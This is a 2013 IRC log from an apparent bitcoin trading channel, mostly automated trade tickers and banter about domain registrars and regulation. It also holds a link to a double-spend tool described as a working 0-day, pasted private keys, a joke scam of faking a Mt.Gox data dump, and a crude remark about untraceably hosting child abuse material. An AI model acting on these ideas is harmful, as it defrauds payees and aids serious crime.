[ASICMINER-PT] 1 @ 2.48 BTC [+] May 30 20:43:04 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 20:43:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.02491 BTC [+] May 30 20:44:14 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 20:44:19 [BTCTC] [ASICMINER-PT] 1 @ 2.4848 BTC [+] May 30 20:44:20 [BTCTC] [S.DICE-PT] 1 @ 0.00293 BTC [-] **** BEGIN LOGGING AT Thu May 30 20:49:53 2013 May 30 20:51:03 [HAVELOCK] [ASICM] 1 @ 0.02495 BTC [-] May 30 20:51:25 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] May 30 20:52:19 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 20:54:23 [BTCTC] [ASICMINER-PT] 4 @ 2.475 = 9.9 BTC [+] May 30 20:56:01 [HAVELOCK] [ASICM] 125 @ 0.02495 = 3.1188 BTC [-] May 30 20:56:48 [BTCTC] [ASICMINER-PT] 2 @ 2.48 = 4.96 BTC [+] May 30 20:58:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.02491 = 0.0996 BTC [+] May 30 20:59:02 [HAVELOCK] [ASICM] 75 @ 0.02495 = 1.8713 BTC [-] May 30 20:59:38 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] May 30 20:59:59 [BTCTC] [B.YABMC] 7 @ 0.01703 = 0.1192 BTC [-] May 30 21:01:08 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 21:01:58 https://blockchain.info/create-double-spend May 30 21:04:57 [BTCTC] [ASICMINER-PT] 11 @ 2.475 = 27.225 BTC [+] May 30 21:05:04 [HAVELOCK] [VTX] 2 @ 0.42211 = 0.8442 BTC [-] May 30 21:07:49 [BTCTC] [TAT.ASICMINER] 20 @ 0.02465 = 0.493 BTC [-] May 30 21:07:51 [BTCTC] [TAT.ASICMINER] 34 @ 0.02465 = 0.8381 BTC [-] May 30 21:07:52 [BTCTC] [TAT.ASICMINER] 20 @ 0.024601 = 0.492 BTC [-] May 30 21:07:54 [BTCTC] [TAT.ASICMINER] 40 @ 0.0246 = 0.984 BTC [-] May 30 21:07:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.02456 = 0.2456 BTC [-] May 30 21:07:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.02455 = 0.0491 BTC [-] May 30 21:07:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.02455 = 0.2455 BTC [-] May 30 21:09:05 lol, wtf Diablo-D3? What's that for? Proof of concept to show how the network handles it? May 30 21:09:45 nice May 30 21:09:45 lol May 30 21:10:02 [HAVELOCK] [ASICM] 8 @ 0.02475 = 0.198 BTC [-] May 30 21:10:03 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [-] May 30 21:10:04 deadweasel: no May 30 21:10:08 apparently a functioning 0 day May 30 21:10:14 that effects <0.8.2 May 30 21:10:34 Diablo-D3: the question is, what version is the majority of the network running May 30 21:11:12 .81 o r less May 30 21:11:17 yeah what deadweasel said May 30 21:11:34 i remember there used to be a page showing the versions with the % of people using May 30 21:11:35 which one is this one ? May 30 21:12:32 anybody try this yet? I bet it simply eats the value of the private key. May 30 21:14:59 [BTCTC] [TAT.ASICMINER] 20 @ 0.024541 = 0.4908 BTC [-] May 30 21:15:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.02454 = 0.2454 BTC [-] May 30 21:15:03 i have, with KyUovvUnQzP4ZTV3NX9nxVNWo8borWucHZWhSzaPva4GBXDrbSZP May 30 21:15:14 it says "checksum failed", which is obviously untrue. May 30 21:15:41 sure it is May 30 21:16:05 bitcoind: "error: {"code":-5,"message":"Invalid private key"}" May 30 21:16:10 hum May 30 21:16:24 i got it off bitadress.org May 30 21:17:01 5JLpnXaPZtw1oJ3eC7Rgdt8TiXPn6X5H3ScvLJx81zwPxbe1vy8 also ? May 30 21:17:06 da fuck, that site broken or what. May 30 21:21:14 mircea_popescu: why not try brainwallet May 30 21:21:56 d34th because a coupla months ago when i was giving some alms to a random "haxxor" kiddo it proven dysfunctional May 30 21:22:28 iirc FabianB was there. May 30 21:22:47 i was gonna say i remember goinf through this before May 30 21:22:55 where you were pulling addresses May 30 21:22:58 and none worked May 30 21:23:47 whoops, wrong button May 30 21:25:13 [BTCTC] [CRYPTO-TRADE] 7 @ 0.2 = 1.4 BTC [+] May 30 21:25:24 http://www.djbooth.net/index/tracks/radio/bob-through-my-head May 30 21:25:33 short film worth watching May 30 21:26:16 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] May 30 21:28:38 [BTCTC] [GSDPT] 1 @ 0.0032 BTC [-] May 30 21:29:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.024899 = 0.0747 BTC [+] May 30 21:33:13 [BTCTC] [BITVPS] 4 @ 0.000726 = 0.0029 BTC [-] May 30 21:33:28 [BTCTC] [ASICMINER-PT] 2 @ 2.455 = 4.91 BTC [-] May 30 21:33:30 [BTCTC] [ASICMINER-PT] 3 @ 2.45101 = 7.353 BTC [-] May 30 21:33:32 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] May 30 21:33:32 [BTCTC] [ASICMINER-PT] 1 @ 2.445 BTC [-] May 30 21:33:36 [BTCTC] [ASICMINER-PT] 1 @ 2.4411 BTC [-] May 30 21:33:40 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [-] May 30 21:33:42 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [-] May 30 21:34:10 [BTCTC] [ASICMINER-PT] 10 @ 2.25 = 22.5 BTC [-] May 30 21:34:34 [BTCTC] [ASICMINER-PT] 1 @ 2.428 BTC [+] May 30 21:34:41 [BTCTC] [ASICMINER-PT] 9 @ 2.427503 = 21.8475 BTC [-] May 30 21:35:13 [BTCTC] [ASICMINER-PT] 4 @ 2.25 = 9 BTC [-] May 30 21:35:55 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [+] May 30 21:36:38 [BTCTC] [ASICMINER-PT] 5 @ 2.427503 = 12.1375 BTC [+] May 30 21:38:55 [BTCTC] [BASIC-MINING] 40 @ 0.63999 = 25.5996 BTC [-] May 30 21:39:17 mircea_popescu: where was i? May 30 21:39:37 when brainwallet failed to make usable privkeys May 30 21:40:35 mircea_popescu: don't think so, never generated brainwallets for me via brainwallet.org (well, none that i actually used) May 30 21:40:48 use this May 30 21:40:50 https://www.bitaddress.org May 30 21:41:09 Scrat tgat was failing earlier. May 30 21:41:20 FabianB iirc there was some kid supposedly having a mtgox leak May 30 21:41:55 ic, i guess i didn't follow that May 30 21:42:13 anyway, minor point May 30 21:42:18 lol thats a great get rich quick scheme May 30 21:42:29 log on irc on vpn, tell mp that you have a gox db dump May 30 21:42:43 i created brain wallets manually via library and sha256sum commandline though in the past May 30 21:43:10 [BTCTC] [PAJKA.BOND] 12 @ 0.10803 = 1.2964 BTC [+] May 30 21:45:03 [HAVELOCK] [ASICM] 1 @ 0.0249 BTC [+] May 30 21:45:24 [BTCTC] [BASIC-MINING] 2 @ 0.64 = 1.28 BTC [+] May 30 21:50:14 [MPEX] [S.DICE] 5000 @ 0.00205001 = 10.2501 BTC [+] May 30 21:50:15 [MPEX] [S.DICE] 100 @ 0.00205 = 0.205 BTC [-] May 30 21:50:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.024899 BTC [+] May 30 21:50:25 [MPEX] [S.DICE] 2500 @ 0.00200002 = 5.0001 BTC [-] May 30 21:50:28 [MPEX] [S.DICE] 1000 @ 0.00200001 = 2 BTC [-] May 30 21:50:30 [MPEX] [S.DICE] 1250 @ 0.002 = 2.5 BTC [-] May 30 21:50:35 [MPEX] [S.DICE] 5000 @ 0.00190003 = 9.5002 BTC [-] May 30 21:50:43 [MPEX] [S.DICE] 2000 @ 0.00190001 = 3.8 BTC [-] May 30 21:50:44 [MPEX] [S.DICE] 5000 @ 0.0019 = 9.5 BTC [-] May 30 21:50:46 [MPEX] [S.DICE] 2000 @ 0.0018502 = 3.7004 BTC [-] May 30 21:50:52 [MPEX] [S.DICE] 5000 @ 0.0018501 = 9.2505 BTC [-] May 30 21:50:52 [MPEX] [S.DICE] 5000 @ 0.0018 = 9 BTC [-] May 30 21:50:54 [MPEX] [S.DICE] 6150 @ 0.00179 = 11.0085 BTC [-] May 30 21:55:45 [BTCTC] [TAT.ASICMINER] 16 @ 0.024899 = 0.3984 BTC [+] May 30 21:55:46 [BTCTC] [TAT.ASICMINER] 9 @ 0.024899 = 0.2241 BTC [+] May 30 21:56:09 [BTCTC] [ASICMINER-PT] 2 @ 2.478888 = 4.9578 BTC [+] May 30 21:57:31 Scrat lol May 30 21:57:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.024899 = 0.249 BTC [+] May 30 21:58:59 [BTCTC] [TAT.ASICMINER] 9 @ 0.024899 = 0.2241 BTC [+] May 30 22:00:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.024899 BTC [+] May 30 22:02:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.024899 = 0.0498 BTC [+] May 30 22:02:47 [BTCTC] [S.DICE-PT] 2 @ 0.00271 = 0.0054 BTC [-] May 30 22:03:11 [BTCTC] [S.DICE-PT] 32 @ 0.0027 = 0.0864 BTC [-] May 30 22:04:05 [BTCTC] [TAT.ASICMINER] 4 @ 0.024898 = 0.0996 BTC [-] May 30 22:05:18 [BTCTC] [BITVPS] 3 @ 0.0007 = 0.0021 BTC [-] May 30 22:08:03 [HAVELOCK] [SDICE] 15 @ 0.2236 = 3.354 BTC [-] May 30 22:08:05 [HAVELOCK] [SDICE] 8 @ 0.2235 = 1.788 BTC [-] May 30 22:08:05 [HAVELOCK] [SDICE] 3 @ 0.2233 = 0.6699 BTC [-] May 30 22:08:06 [HAVELOCK] [SDICE] 9 @ 0.22311 = 2.008 BTC [-] May 30 22:08:07 [HAVELOCK] [SDICE] 8 @ 0.2225 = 1.78 BTC [-] May 30 22:08:09 [HAVELOCK] [SDICE] 4 @ 0.2222745 = 0.8891 BTC [-] May 30 22:08:10 [HAVELOCK] [SDICE] 9 @ 0.211 = 1.899 BTC [-] May 30 22:08:11 [HAVELOCK] [SDICE] 3 @ 0.2109 = 0.6327 BTC [-] May 30 22:08:12 [HAVELOCK] [SDICE] 15 @ 0.21 = 3.15 BTC [-] May 30 22:08:26 [HAVELOCK] [SDICE] 26 @ 0.2 = 5.2 BTC [-] May 30 22:09:52 [BTCTC] [ASICMINER-PT] 4 @ 2.478888 = 9.9156 BTC [+] May 30 22:10:03 [HAVELOCK] [SDICE] 89 @ 0.2 = 17.8 BTC [-] May 30 22:10:04 [HAVELOCK] [SDICE] 4 @ 0.18001 = 0.72 BTC [-] May 30 22:20:03 [HAVELOCK] [SDICE] 2 @ 0.18 = 0.36 BTC [-] May 30 22:24:19 [MPEX] [S.MPOE] 2157 @ 0.00072394 = 1.5615 BTC [-] May 30 22:24:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.024898 = 0.0996 BTC [-] May 30 22:26:03 [HAVELOCK] [SDICE] 5 @ 0.18 = 0.9 BTC [-] May 30 22:26:28 Everyone must be off double spending May 30 22:26:36 [BTCTC] [S.DICE-PT] 68 @ 0.0027 = 0.1836 BTC [-] May 30 22:26:38 [BTCTC] [S.DICE-PT] 500 @ 0.002675 = 1.3375 BTC [-] May 30 22:26:42 [BTCTC] [S.DICE-PT] 12 @ 0.00262 = 0.0314 BTC [-] May 30 22:26:44 [BTCTC] [S.DICE-PT] 1000 @ 0.002601 = 2.601 BTC [-] May 30 22:26:48 !ticker m S.DICE May 30 22:26:49 [MPEX:S.DICE] 1D: 0.00179 / 0.00197546 / 0.00296096 (45000 shares, 88.90 BTC), 7D: 0.00179 / 0.00212032 / 0.00296096 (71045 shares, 150.64 BTC), 30D: 0.00135 / 0.0024721 / 0.00338999 (394909 shares, 976.26 BTC) May 30 22:26:57 ...... May 30 22:27:02 when did that happen? May 30 22:27:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.024898 = 0.0498 BTC [-] May 30 22:29:33 since there's a 2 million shares sell order at 0.0035, SD volume is down, they stopped serving the US (yes I know they can't really block US traffic) and will probably have 0 profit/a loss this month... May 30 22:31:03 [HAVELOCK] [ASICM] 1 @ 0.02485 BTC [-] May 30 22:31:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.024898 = 0.1245 BTC [-] May 30 22:32:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.024898 = 0.1245 BTC [-] May 30 22:34:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.024899 = 0.0747 BTC [+] May 30 22:34:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.024899 = 0.249 BTC [+] May 30 22:34:41 but transaction count is still high, isn't it? May 30 22:37:54 [BTCTC] [TAT.ASICMINER] 163 @ 0.0249 = 4.0587 BTC [+] May 30 22:40:32 For SDICE? May 30 22:42:53 I guess it's still high May 30 22:42:59 But still, somewhat down May 30 22:43:30 used to be like half transactions May 30 22:44:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [+] May 30 22:47:37 [BTCTC] [TAT.ASICMINER] 20 @ 0.024601 = 0.492 BTC [-] May 30 22:47:39 [BTCTC] [TAT.ASICMINER] 31 @ 0.024601 = 0.7626 BTC [-] May 30 22:47:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.0246 = 0.0984 BTC [-] May 30 22:47:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.024552 = 0.0737 BTC [-] May 30 22:47:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.024551 = 0.1228 BTC [-] May 30 22:47:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.02455 = 0.2455 BTC [-] May 30 22:49:07 [BTCTC] [TAT.ASICMINER] 6 @ 0.0249 = 0.1494 BTC [+] May 30 22:53:46 [BTCTC] [PAJKA.BOND] 5 @ 0.1098 = 0.549 BTC [+] May 30 22:55:07 Namworld: when did the US ban Satoshi Dice? May 30 22:55:57 They never. SD did ban US traffic from their website however. May 30 22:56:09 Not that they can't still just send bets to the SD addresses... May 30 22:58:44 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 30 22:59:50 anyone got a link to voorhees interview from the last conference May 30 22:59:58 or presentation May 30 23:00:01 or whatever he had there May 30 23:00:05 cant find it on yt May 30 23:02:39 [BTCTC] [TAT.ASICMINER] 9 @ 0.024552 = 0.221 BTC [-] May 30 23:06:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.024899 = 0.1992 BTC [+] May 30 23:06:29 [BTCTC] [RSM] 1 @ 0.00661 BTC [-] May 30 23:06:54 warning: might need to shutdown havelock for ~30 seconds in the next hour or so May 30 23:06:59 [BTCTC] [RSM] 7 @ 0.0066 = 0.0462 BTC [-] May 30 23:07:03 switching trade engines May 30 23:07:07 mmooooooooaaaaaaaaaaaaar speeeeeeed May 30 23:07:28 [BTCTC] [RSM] 12 @ 0.006273 = 0.0753 BTC [-] May 30 23:09:37 [BTCTC] [TAT.ASICMINER] 7 @ 0.024899 = 0.1743 BTC [+] May 30 23:15:03 [HAVELOCK] [ASICM] 4 @ 0.02450301 = 0.098 BTC [-] May 30 23:15:04 [HAVELOCK] [ASICM] 38 @ 0.024503 = 0.9311 BTC [-] May 30 23:15:05 [HAVELOCK] [ASICM] 50 @ 0.02450202 = 1.2251 BTC [-] May 30 23:15:07 [HAVELOCK] [ASICM] 6 @ 0.0245 = 0.147 BTC [-] May 30 23:15:08 [HAVELOCK] [ASICM] 94 @ 0.0245 = 2.303 BTC [-] May 30 23:17:57 hi all, selling BTC for LR_USD May 30 23:18:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.024897 = 0.1245 BTC [-] May 30 23:19:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.024898 BTC [+] May 30 23:21:47 haha Lyspooner May 30 23:21:59 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] May 30 23:25:03 [HAVELOCK] [ASICM] 58 @ 0.0245 = 1.421 BTC [-] May 30 23:26:03 [HAVELOCK] [ASICM] 5 @ 0.0245 = 0.1225 BTC [-] May 30 23:27:13 [BTCTC] [TAT.ASICMINER] 20 @ 0.024601 = 0.492 BTC [-] May 30 23:27:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [-] May 30 23:27:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.024559 = 0.2456 BTC [-] May 30 23:27:17 [BTCTC] [TAT.ASICMINER] 100 @ 0.024556 = 2.4556 BTC [-] May 30 23:27:19 [BTCTC] [TAT.ASICMINER] 24 @ 0.024555 = 0.5893 BTC [-] May 30 23:28:51 [BTCTC] [TAT.ASICMINER] 46 @ 0.024897 = 1.1453 BTC [+] May 30 23:29:03 [HAVELOCK] [ASICM] 90 @ 0.0246 = 2.214 BTC [+] May 30 23:29:04 [HAVELOCK] [ASICM] 37 @ 0.0245 = 0.9065 BTC [-] May 30 23:29:05 [HAVELOCK] [ASICM] 4 @ 0.0245 = 0.098 BTC [-] May 30 23:29:07 [HAVELOCK] [ASICM] 1 @ 0.0243 BTC [-] May 30 23:29:08 [HAVELOCK] [ASICM] 2 @ 0.02425 = 0.0485 BTC [-] May 30 23:29:09 [HAVELOCK] [ASICM] 439 @ 0.02421001 = 10.6282 BTC [-] May 30 23:29:09 [HAVELOCK] [ASICM] 4 @ 0.02420004 = 0.0968 BTC [-] May 30 23:29:10 [HAVELOCK] [ASICM] 223 @ 0.02420003 = 5.3966 BTC [-] May 30 23:31:18 [BTCTC] [TAT.ASICMINER] 34 @ 0.024554 = 0.8348 BTC [-] May 30 23:33:33 [BTCTC] [S.DICE-PT] 5 @ 0.002899 = 0.0145 BTC [+] May 30 23:35:39 [MPEX] [S.MPOE] 3343 @ 0.00072356 = 2.4189 BTC [-] May 30 23:35:41 [MPEX] [S.MPOE] 2772 @ 0.00072786 = 2.0176 BTC [+] May 30 23:46:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.024743 BTC [+] May 30 23:50:28 [BTCTC] [ASICMINER-PT] 5 @ 2.474999 = 12.375 BTC [+] May 30 23:50:30 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] May 30 23:50:32 [BTCTC] [ASICMINER-PT] 6 @ 2.476998 = 14.862 BTC [+] May 30 23:55:13 https://bitcointalk.org/index.php?topic=176077.msg2322640#msg2322640 May 30 23:55:16 lol she's in top shape May 30 23:57:03 [HAVELOCK] [ASICM] 34 @ 0.0247 = 0.8398 BTC [+] May 30 23:59:25 [BTCTC] [TAT.ASICMINER] 9 @ 0.024743 = 0.2227 BTC [+] May 31 00:00:03 [MPEX] [S.MPOE] 2026 @ 0.00072786 = 1.4746 BTC [+] May 31 00:00:26 http://www.americanbanker.com/issues/178_104/fincen-chief-q-and-a-what-we-expect-from-digital-currency-firms-1059485-1.html?zkPrintable=1&nopagination=1 May 31 00:00:55 anything good ? May 31 00:02:02 [BTCTC] [TAT.ASICMINER] 6 @ 0.02474 = 0.1484 BTC [-] May 31 00:02:15 [BTCTC] [ASICMINER-PT] 1 @ 2.474001 BTC [-] May 31 00:02:17 [BTCTC] [ASICMINER-PT] 4 @ 2.476 = 9.904 BTC [+] May 31 00:02:47 tldr = Be a real MSB or we gon git ya May 31 00:03:19 and, We <3 AML May 31 00:03:24 [BTCTC] [BITVPS] 15 @ 0.000714 = 0.0107 BTC [+] May 31 00:04:30 [HAVELOCK] [ASICM] 1 @ 0.0247 BTC [+] May 31 00:04:36 "DIGITAL CURRENCIES ARE JUST A FINANCIAL SERVICE AND THOSE WHO DEAL IN THEM ARE A FINANCIAL INSTITUTION." May 31 00:04:41 pullout quote May 31 00:04:44 sorry for caps May 31 00:05:16 She also denied that the guidelines were a new regulatory framework, instead referring to them as technical explanations of "something that already exists." Because of this, she said it wasn't necessary to ask for public comment. But the conversation over virtual currencies, she said, will be ongoing. For now, Shasky Calvery said that she wasn't worried about the Liberty Reserve case May 31 00:05:16 creating chilling effects on the larger market, and that it wouldn't set the tone for future action. "I would be hesitant ever to paint a broad brush because of one criminal action against an entire industry. I don't think that's fair to an industry in any situation, let alone this one." May 31 00:05:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.02474 = 0.099 BTC [-] May 31 00:05:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.024743 = 0.099 BTC [+] May 31 00:06:26 mmmkay May 31 00:07:00 i read that too May 31 00:07:15 http://www.aljazeera.com/news/europe/2013/05/2013530161034481208.html May 31 00:07:19 also noticed the classification May 31 00:07:20 Up to $30bn 'stolen' from Sochi Olympic funds May 31 00:07:26 Putin opponents claim Russian business people and officials have siphoned billions intended to fund 2014 Winter Games. May 31 00:07:37 [BTCTC] [PAJKA.BOND] 10 @ 0.1098 = 1.098 BTC [+] May 31 00:07:39 I blame BTC-E May 31 00:07:39 [BTCTC] [PAJKA.BOND] 5 @ 0.1099 = 0.5495 BTC [+] May 31 00:07:40 [BTCTC] [PAJKA.BOND] 2 @ 0.10999 = 0.22 BTC [+] May 31 00:08:47 lol May 31 00:09:53 [BTCTC] [GSDPT] 25 @ 0.003449 = 0.0862 BTC [+] May 31 00:10:08 "Putin, who has staked his reputation on a successful Games, faces criticism over allegations of corruption and costs overruns that have pushed up the price tag for the event to $50bn - five times more than initially planned." May 31 00:10:13 ridiculous May 31 00:13:25 I lose billions here and there, but $30bn, now that's just irresponsible May 31 00:14:05 [MPEX] [S.MPOE] 3250 @ 0.00072294 = 2.3496 BTC [-] May 31 00:14:59 [BTCTC] [ASICMINER-PT] 1 @ 2.476 BTC [+] May 31 00:17:28 i don't get the outrage. it's just russian version of bailout May 31 00:18:27 if anyone wants a cool rap song to listen to: http://www.youtube.com/watch?v=E3Ie4CcTGKY May 31 00:18:50 ^^ May 31 00:18:58 bernanke lost moar than 50bn May 31 00:19:44 http://namecheap.com ? May 31 00:19:55 [HAVELOCK] [ASICM] 1 @ 0.0247 BTC [+] May 31 00:20:16 ? May 31 00:20:33 they will be my next registrar May 31 00:20:43 but not sure why you linked em May 31 00:21:00 We apologize. namecheap.com is experiencing technical difficulties, please try back later. May 31 00:22:16 woah, namecheap down May 31 00:22:55 works fine for me May 31 00:24:12 [BTCTC] [BITVPS] 2 @ 0.000714 = 0.0014 BTC [+] May 31 00:24:38 could be their EU nodes May 31 00:26:05 they are banning people that can play satoshidice May 31 00:26:24 lmfao May 31 00:26:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.024743 = 0.0742 BTC [+] May 31 00:26:53 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [-] May 31 00:27:50 btw mircea_popescu as a side note re: your criticism of YC ventures using godaddy May 31 00:27:57 !ticker h asicm May 31 00:27:59 [HAVELOCK:ASICM] 1D: 0.02420003 / 0.02468709 / 0.02543499 (7033 shares, 173.62431620 BTC), 7D: 0.02400000 / 0.02480026 / 0.02600000 (54769 shares, 1358.28563257 BTC), 30D: 0.01290000 / 0.02116592 / 0.03000000 (269342 shares, 5700.87035327 BTC) May 31 00:28:06 ye ? May 31 00:28:09 a lot of those in fact just use google apps to register a domain, May 31 00:28:18 which in turn uses godaddy May 31 00:28:24 sooo ? May 31 00:28:32 kind aworse May 31 00:28:40 i wanna murder godaddy May 31 00:28:47 so they use google as a registrar May 31 00:28:51 notrly. May 31 00:28:54 they use google as a broker May 31 00:28:55 [BTCTC] [MININGCO.ETF] 2 @ 0.779 = 1.558 BTC [-] May 31 00:28:59 because they're intellectually lazy scum. May 31 00:29:12 well, you get free google for business for a year May 31 00:29:17 so its a sound business decision May 31 00:29:20 this supports my point. May 31 00:29:20 google apps for business* May 31 00:29:22 no, it is not. May 31 00:29:34 you dont like google apps? May 31 00:29:39 google apps for business is overpriced May 31 00:29:43 i like it May 31 00:29:57 i giot most of my clients in it while it was free May 31 00:29:59 it's not a matter of liking or not liking. it's a matter of imagining that using some free thing is a sound business decision. May 31 00:30:03 that's not business. that's freakshow. May 31 00:30:22 i never saw any fre domain offers though May 31 00:30:29 ThickAsThieves: its the other way round May 31 00:30:40 if you register a domain via them, you get free gapps May 31 00:30:45 [HAVELOCK] [ASICM] 33 @ 0.0246 = 0.8118 BTC [-] May 31 00:30:57 ah May 31 00:31:09 fiat500 but do you see why this is a strategically inept move ? May 31 00:31:11 mircea_popescu: dunno man, cutting costs sounds like sound business to me, especially when they're still getting the same package they would otherwise have paid for May 31 00:31:23 that can be a pretty big savings May 31 00:31:30 google wants $55 per user right? May 31 00:31:37 per year yes May 31 00:31:40 they are not cutting costs wtf. May 31 00:31:43 [HAVELOCK] [ASICM] 24 @ 0.0246 = 0.5904 BTC [-] May 31 00:31:44 [BTCTC] [TAT.ASICMINER] 8 @ 0.024743 = 0.1979 BTC [+] May 31 00:32:05 let's go some other way. you run a blog. which is what most of these "busionesses" are anyway, but let's not delve. May 31 00:32:21 mircea_popescu: when they are in YC they have very little funding to get extravagant with services May 31 00:32:24 now, is it a sound business decision to give your commentaries away to that piece of shit i can't recall the name of May 31 00:32:31 on the grounds that "you get free storage" ? May 31 00:32:37 bob parsons? May 31 00:32:38 lmao May 31 00:32:45 55 dollars is extravagant with a one person cheap meal. May 31 00:32:51 not a service. May 31 00:32:55 The Elephant Hunter Extraordinaire May 31 00:33:11 people whose "business decisions" are oriented by the need to save fiddy bucks are not in business. May 31 00:33:19 mircea_popescu: its not 55 total though May 31 00:33:27 its not fiddy bucks when you have 100000 staff May 31 00:33:36 A cool rap song is here http://www.youtube.com/watch?v=2uLQOYtpZsA May 31 00:33:38 100k staff ? srsly ? May 31 00:33:41 but can still make more sense May 31 00:33:42 hehe May 31 00:33:45 nobody in the us has 100k staff. nobody. May 31 00:33:46 name one. May 31 00:33:55 IBM has 5000k May 31 00:33:58 er 500k May 31 00:34:05 google probly has the most people May 31 00:34:06 walmart significantly more May 31 00:34:11 but obv they get free GApps May 31 00:34:12 google has fuck all May 31 00:34:20 fine >< May 31 00:34:23 hahahaha May 31 00:34:39 btw have you guys seen how google treats its largest work force? May 31 00:34:42 google say >30000 staff May 31 00:35:01 so ibm could save a whoppign 25mn a year by using gaps. May 31 00:35:04 my employer has three times that May 31 00:35:07 http://en.wikipedia.org/wiki/List_of_largest_employers May 31 00:35:08 im sure they care deep in their colon somewhere May 31 00:35:23 IBM has the mightly lotus notes however May 31 00:35:32 us department of defense has 3.2 mio May 31 00:35:34 fuck :) May 31 00:35:36 it's easier to get small countries to change email than it is a business that size. May 31 00:35:47 mircea_popescu: anyway, what i dont get obviously is why google doesnt just spend the $25k to get ICANN accreditation May 31 00:35:51 IBM doesnt know how to do email May 31 00:35:51 and become its own registrar May 31 00:35:55 so its irrelevant May 31 00:35:57 me either. May 31 00:35:59 they dont have email May 31 00:36:08 they have a file sharing service May 31 00:36:21 orkaa most of the us is employed by the us govt May 31 00:36:26 as you'd expect of 3rd world shithole. May 31 00:36:36 heh lotus notes May 31 00:36:49 today the US let me have TWO loaves of bread May 31 00:36:52 so stoked May 31 00:37:03 [MPEX] [S.MPOE] 9300 @ 0.00072567 = 6.7487 BTC [+] May 31 00:37:06 i got it pretty easy here. May 31 00:37:16 TAT: chocolate rations were increased this week May 31 00:37:30 i get to twix nao May 31 00:37:32 ircea_popescu: anyway, what i dont get obviously is why google doesnt just spend the $25k to get ICANN accreditation < it is already veging on the US definition of monopoly May 31 00:37:35 m May 31 00:37:36 *two May 31 00:37:57 yeah goog need to tread lightly May 31 00:38:01 google also spent like bajillions on custom tld applications May 31 00:38:07 if you do something really well, obviously two or three can do it better :( May 31 00:38:10 jborkl prolly the reason. May 31 00:38:14 so as to not remind people abou th ewhole world domination plan May 31 00:38:35 google was talking about having their own island recently May 31 00:38:39 so they can do whatever they want May 31 00:38:58 google pretty much own this planet May 31 00:39:24 "i'm 12 and i do what i want!" May 31 00:39:40 google is going to start having sex with older men May 31 00:39:42 no protection May 31 00:40:03 if it's innovative man-sex, maybe May 31 00:40:18 [MPEX] [S.MPOE] 3200 @ 0.00072567 = 2.3221 BTC [+] May 31 00:40:20 [MPEX] [S.MPOE] 650 @ 0.0007258 = 0.4718 BTC [+] May 31 00:41:25 LOL May 31 00:42:27 btw in case anyone is interested in finding a no-nonsense registrar, gandi is probably the best May 31 00:42:40 namecheap is teh best. May 31 00:42:42 even networksolutions is trying to sell "add-ons" now, embarassing May 31 00:43:05 namecheap take buttcoins May 31 00:43:07 NS got bought by Web.com May 31 00:43:09 so game over May 31 00:43:10 yeah i have about 30 domains at namecheap May 31 00:43:12 and that was the end for them May 31 00:43:14 dub: bullshit! May 31 00:43:14 [HAVELOCK] [ASICM] 10 @ 0.02469 = 0.2469 BTC [+] May 31 00:43:35 they don't? May 31 00:43:42 i mean, show me May 31 00:43:53 im interested, i have some renewals coming up lol May 31 00:43:56 well I havent looked but that was news a few months ago May 31 00:44:05 yeah they do May 31 00:44:07 afaik May 31 00:44:09 https://www.namecheap.com/support/payment-options/bitcoin.aspx May 31 00:44:10 :O May 31 00:44:18 "aspx" *frowny* May 31 00:44:25 except i'd rather use my cash May 31 00:44:30 but props to them May 31 00:44:49 mircea_popescu: problem is namecheap is now trying to get into hosting and other crap May 31 00:45:28 well ya. i dun use that tho May 31 00:45:36 im sure theres not enough profit in being a pure registrar (no wonder gandi prices are 50% higher) May 31 00:45:47 dub yes they do. May 31 00:45:50 i paid with btc. May 31 00:46:14 21:44 < ThickAsThieves> except i'd rather use my cash May 31 00:46:26 because the btc you spend now could be worth 10x as much later? :P May 31 00:47:01 the point is that you buy btc with cash May 31 00:47:05 and pay the domain with btc May 31 00:47:11 then host childporn or some shit May 31 00:47:39 O_o May 31 00:47:54 no money trace May 31 00:48:12 https://mtgox.com/press_release_20130530.html May 31 